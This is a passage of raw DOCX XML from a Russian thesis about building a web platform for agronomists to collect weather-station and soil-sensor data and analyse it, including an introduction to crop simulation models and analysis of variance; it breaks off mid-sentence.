    <w:p w14:paraId="735EE281" w14:textId="124A9A93" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="00502C9D" w:rsidP="00464AEF">
      <w:r>
        <w:t>Создание интернет-платформы для работы с полевыми наблюдениями с целью мониторинга и анализа этих данных исследователями в сфере сельского хозяйства и агрономами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24531F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc122277544"/>
      <w:bookmarkStart w:id="9" w:name="_Toc161568202"/>
      <w:bookmarkStart w:id="10" w:name="_Toc162709229"/>
      <w:r w:rsidRPr="00541C36">
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7E95813C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc122277545"/>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Определение достоинств и недостатков существующих </w:t>
      </w:r>
      <w:r>
        <w:t>статистических пакетов и агрономических веб-сервисов</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488BC4BF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t>Выбор технологий и методов создания приложения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>проведения исследований и обработки данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507A73C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Реализация </w:t>
      </w:r>
      <w:r>
        <w:t>алгоритмов предварительной обработки данных и алгоритмов проведения дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A76618" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Создание пользовательского интерфейса приложения </w:t>
      </w:r>
      <w:r>
        <w:t>для проведения исследования и обработки данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E044A2A" w14:textId="77777777" w:rsidR="006F5353" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Оценка эффективности работы приложения </w:t>
      </w:r>
      <w:r>
        <w:t>для проведения исследования и обработки данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DDD83" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447CF09" w14:textId="0D86D4C7" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc161568203"/>
      <w:bookmarkStart w:id="13" w:name="_Toc162709230"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00BF50CB">
        <w:t>информационных технологий и математических моделей для решения задач в сфере сельского хозяйства</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="71DE3F5E" w14:textId="657035F4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc161568204"/>
      <w:bookmarkStart w:id="15" w:name="_Toc162709231"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Необходимость разработки программы для проведения исследований</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="000D039E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3A5602C7" w14:textId="778FC42C" w:rsidR="000D039E" w:rsidRDefault="000D039E" w:rsidP="000D039E">
      <w:r>
        <w:t>Для решения задач в сельском хозяйстве абсолютно всегда необходимо работать на опытном полигоне. Такой полигон, как правило, представляет собой сельскохозяйственное поле на несколько гектар, где выращиваются различные культуры. Такой подход к разработкам в данной предметной области вполне обоснован: на реальном поле проводятся эксперименты с различными севооборотами, исследуются различные болезни почвы или культуры, путем заражени</w:t>
      </w:r>
      <w:r w:rsidR="00696789">
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> некоторых площадок на поле и т.д. Опытный агроном, безусловно, должен постоянно находиться на поле и вручную проводить эксперименты с агроэкосистемой, но некоторую человеческую работу можно автоматизировать, внедрить некую информационную систему, пользуясь которой</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исследователь сможет </w:t>
      </w:r>
      <w:r w:rsidR="00696789">
        <w:t>наблюдать или проводить статистические опыты, не находясь в этот момент на поле.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B58DC8" w14:textId="77777777" w:rsidR="00E8167C" w:rsidRDefault="00696789" w:rsidP="000D039E">
      <w:r>
        <w:t>Для мониторинга состояния агроэкосистемы используются автоматические цифровые метеостанции и почвенные датчики-влагомеры. Данные устройства представляют собой набор электронных датчиков, соединённых в единую сеть. Каждый датчик отвечает за сбор информации о какой-то конкретной характеристик</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> агроэкосистем</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:t>, например, в цифровую автоматическую метеостанцию вмонтированы солнечная батарея, измеряющая солнечную радиацию; флюгер, измеряющий скорость ветра; датчик осадков</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> датчик освещенности и т.д. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2869D" w14:textId="04781C8D" w:rsidR="00696789" w:rsidRPr="000D039E" w:rsidRDefault="00696789" w:rsidP="000D039E">
      <w:r>
        <w:t>Почвенный датчик-влагомер представляет собой продолговатое устройство</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t>, котор</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>ое</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t xml:space="preserve"> заглубляется в отверстие в почве</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с пятью сенсорами, которые распределены вдоль влагомера</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>К</w:t>
      </w:r>
      <w:r>
        <w:t>аждый сенсор измеряет влажность почвы на одном из пяти почвенных слоёв. Эти устройства автоматически</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t xml:space="preserve"> (каждые 2-3 секунды)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> высылают собранную информацию на сервер базы </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>данных по беспроводной сети интернет</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>Н</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">а основании собранных данных агроном сможет </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>проводить</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исследования, ознакомившись со сводными таблицами или графиками, где будут перечислены все </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>интересующие его</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> характеристики агроэкосистемы.</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t xml:space="preserve"> Также исследователю будет полезно провести статистический анализ данных для того</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t xml:space="preserve"> чтобы найти закономерности и неочевидные тенденции в собранных данных</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [1]</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631F4B4" w14:textId="291023FF" w:rsidR="0093378B" w:rsidRPr="006612A3" w:rsidRDefault="0093378B" w:rsidP="006612A3">
      <w:r>
        <w:t xml:space="preserve">Статистика – наука, которая разрабатывает математические методы систематизации и применения статистических данных для практических и научных выводов. </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>Статистика</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тесно связана с математическим аппаратом и с теорией вероятности: часто статистика использует те же формулы и методы, но решает задачи, которые являются противоположными задачам из теории вероятностей. Статистика помогает описывать данные, анализировать их, строить прогнозы. Одним из самых известных и наукоёмких инструментов, применяемых для анализа данных в абсолютно любых предметных областях явля</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>ю</w:t>
      </w:r>
      <w:r>
        <w:t>тся информационн</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>ые</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> систем</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проведения статистического анализа, так называемы</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> «Статистически</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пакет</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75858B75" w14:textId="1D0E434B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006612A3">
      <w:r>
        <w:t xml:space="preserve">Смысл этих программ состоит в том, чтобы на основе собранных эмпирических наблюдений в виде таблицы провести статистический анализ соответствующих данных, </w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">затем результаты анализа проинтерпретировать. Статистический анализ может быть реализован с помощью описательных статистик – нахождение среднего, медианы, стандартного отклонения, доверительного интервала и т.д., </w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r>
        <w:t>можно провести дисперсионный анализ для исследования наличия или отсутствия существенного влияния какого-либо качественног</w:t>
      </w:r>
      <w:r w:rsidR="00684E96">
        <w:t>о признака.</w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00152208" w:rsidRPr="000D039E">
        <w:t>Под качественным признаком понимается переменная, которой невозможно присвоить единицы измерения, например тип удобрения, пол, цвет и т.д.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Также в классической статистике применяется регрессионный, кластерный и дискриминантный анализ</w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:t>ыбор статистического метода зависит от входных данных и потребностей исследователя, но эти методы не являются объектами текущего исследования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1F9605" w14:textId="38DE689B" w:rsidR="00152208" w:rsidRDefault="0093378B" w:rsidP="00152208">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Сельское хозяйство – это одна из тех предметных областей, где обосновано применение статистических методов </w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>т.к.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в этой </w:t>
      </w:r>
      <w:r w:rsidR="002213CB">
        <w:t>отрасли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> получаются точные «осязаемые» результаты в зависимости от исходных условий при исследовании объекта, такие как: вес растения, количество удобрений и полива, объем корневой системы, тип культуры и </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>т.д..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> На сегодняшний день в сельском хозяйстве есть множество статистических и динамических моделей продукционного процесса </w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00152208">
        <w:t>Динамический характер означает, что в ходе расчёта модели состояние изучаемого объекта моделирования (в данном случае – агроэкосистемы) пересчитывается шаг за шагом по мере течения модельного времени, подобно тому, как реальный посев растёт и развивается на сельскохозяйственном поле под действием влияющих факторов внешней среды. С алгоритмической точки зрения сущность модели выражается в виде эволюционного оператора</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB4597" w14:textId="5D5EDDC9" w:rsidR="00152208" w:rsidRDefault="00152208" w:rsidP="00152208">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00152208">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:position w:val="-14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:object w:dxaOrig="2790" w:dyaOrig="510" w14:anchorId="24195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25.5pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1777045171" r:id="rId10"/>
        </w:object>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F440144" w14:textId="5FF6DADB" w:rsidR="0093378B" w:rsidRDefault="00152208" w:rsidP="00DE3513">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">где k – текущий временной шаг динамической модели (в большинстве распространённых моделей он принимается равным одним суткам), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – вектор состояния модели (набор динамических характеристик, достаточно полно описывающих текущее состояние объекта моделирования), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – вектор управляющих воздействий (агротехника), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – вектор неконтролируемых воздействий (погода), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – вектор статических параметров модели, определяющих сам объект и его окружение (параметры культуры, почвы, местности и т.д.). Внутренняя логика, отличающая одну модель от другой, скрыта в способе вычисления алгоритма рекурсивного пересчёта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>.  Таким образом, динамические модели продукционного процесса (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Models</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в традиционной английской транскрипции) относятся к сфере т.н. имитационного моделирования (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Simulation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>models</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), принципиальной чертой которых является динамическое описание поведения системы во временной развёртке. </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve">Такие программы решают проблемы управления сельским </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">хозяйством, создавая математическую модель развития какой-либо культуры, с момента посадки до момента всходов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF147A0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D82ACC">
      <w:r>
        <w:t>Федеральное государственное бюджетное научное учреждение «Агрофизический научно-исследовательский институт» занимается разработками в сфере сельского хозяйства, и лаборатория математического моделирования отдела 170 «Моделирования адаптивных технологий» поставила задачу – разработка методики интеграции интеллектуальной системы прогноза роста и развития растений с оптимизированной сетевой архитектурой гибридной беспроводной сенсорной сети для решения задач растениеводства на основе системы оперативного мониторинга данных метеостанции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59558842" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00281AB2">
      <w:r>
        <w:t>Цели заказчика:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41594297" w14:textId="5DE7E9C3" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00281AB2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Формирование полевых данных в удобной для проведения </w:t>
      </w:r>
      <w:r w:rsidR="005F6605">
        <w:t>модельных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> расчетов </w:t>
      </w:r>
      <w:r w:rsidR="005F6605">
        <w:t>форме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C62F0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00E301E6" w:rsidRDefault="0093378B" w:rsidP="00281AB2">
      <w:r w:rsidRPr="00541C36">
        <w:t>Задачи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> заказчика:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C60FD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00E301E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Разработка информационной системы по сбору, хранению и обработке агрометеорологических данных, поступающих с автоматической цифровой метеостанции, установленной на сельскохозяйственном поле;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C318E8C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00281AB2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Развертывание информационной системы на сервере;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04365306" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00281AB2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Размещение сайта (представления) системы в интернете.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BCF91" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="005924E5" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r>
        <w:t>В последующих разделах текущего исследования будет приведено детальное описание технических характеристик инструментов, предоставленных заказчиком, а также разработанного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6C4F7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E301E6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc161568205"/>
      <w:bookmarkStart w:id="17" w:name="_Toc162709232"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Необходимость использования дисперсионного анализа</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="31EF2906" w14:textId="6F477560" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t>Дисперсионный</w:t>
      </w:r>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>анализ</w:t>
      </w:r>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANOVA</w:t>
      </w:r>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANalysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VAriance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001C29A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">статистический метод изучения взаимосвязи. Применяется для исследования влияния одной или нескольких качественных переменных на одну зависимую </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>количественную. В основе дисперсионного анализа лежит предположение, что одни переменные могут рассматриваться как причины (независимые переменные), а другие как следствия (зависимые переменные</w:t>
      </w:r>
      <w:r w:rsidR="005C1D63">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Независимые переменные в дисперсионном анализе называют факторами, поскольку в ходе эксперимента исследователь может заменять их значения и анализировать получаемый результат зависимой количественной переменной.</w:t>
      </w:r>
      <w:r w:rsidR="005C1D63">
        <w:t xml:space="preserve"> Зависимые переменные называют откликами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F05973B" w14:textId="17CD6A1B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t xml:space="preserve">Цель дисперсионного анализа – </w:t>
      </w:r>
      <w:r w:rsidR="00DE3513">
        <w:t>изучение влияния одной или нескольких независимых переменных, обычно именуемых факторами, на зависимую переменную. Зависимые переменные представлены значениями абсолютных значений. Независимые переменные являются номинативными, то есть отражают групповую принадлежность, и могут иметь два или более значения (типа, градации или уровня)</w:t>
      </w:r>
      <w:r>
        <w:t>. Для этого фактор, предположительно имеющий или не имеющий существенного влияния, разделяют на классы градации (говоря иначе, группы) и выясняют путём исследования значимости между средними в наборах данных, соответствующих градациям фактора</w:t>
      </w:r>
      <w:r w:rsidR="005C1D63">
        <w:t>, одинаково ли влияние фактора</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5DAE">
        <w:t xml:space="preserve">Например: исследуется зависимость получаемого процента влажности почвы </w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE" w:rsidRPr="001F5DAE">
        <w:t>датчиком</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5DAE">
        <w:t xml:space="preserve">-влагомером от </w:t>
      </w:r>
      <w:commentRangeStart w:id="18"/>
      <w:r w:rsidRPr="001F5DAE">
        <w:t xml:space="preserve">версии </w:t>
      </w:r>
      <w:commentRangeEnd w:id="18"/>
